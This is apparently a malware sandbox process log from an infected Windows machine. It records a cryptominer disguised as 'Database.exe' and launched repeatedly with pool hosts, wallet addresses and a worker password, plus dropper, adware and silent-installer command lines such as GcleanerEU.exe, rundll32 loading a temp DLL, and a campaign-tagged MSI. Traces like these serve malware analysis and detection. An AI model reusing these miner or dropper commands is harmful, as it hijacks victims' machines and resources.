C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
C:\ProgramData\Data\Database.exe
"C:\ProgramData\Data\Database.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 6888 -ip 6888
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6888 -s 124
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0abfc8c5-4e2f-3d40-a51d-2f2740842d0a}\oemvista.inf" "9" "4d14a44ff" "0000000000000144" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\ProgramData\Data\Database.exe
-epool eth-eu1.nanopool.org:9999 -ewal 0x49D4468FB0205F38d102236C33ad424764Fe94C8 -worker Hesoyam -epsw Hesoyam2281337 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth -acm"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000144" "9e70"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3928 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa0bb846f8,0x7ffa0bb84708,0x7ffa0bb84718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ivm2ceyj.33y\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe /eufive
C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe
C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe & exit
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1780 -ip 1780
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 276
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 225A4115411207A569DF473F22DEA76A C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe /mixfive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe" -q
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sub0nzvt.ah1\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5784 -ip 5784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 280
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8160 -ip 8160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8160 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DB9D.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4660 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffa1a8edec0,0x7ffa1a8eded0,0x7ffa1a8edee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x190,0x1c4,0x7ff6e7f59e70,0x7ff6e7f59e80,0x7ff6e7f59e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=1760 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=2280 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2592 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2440 /prefetch:1
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
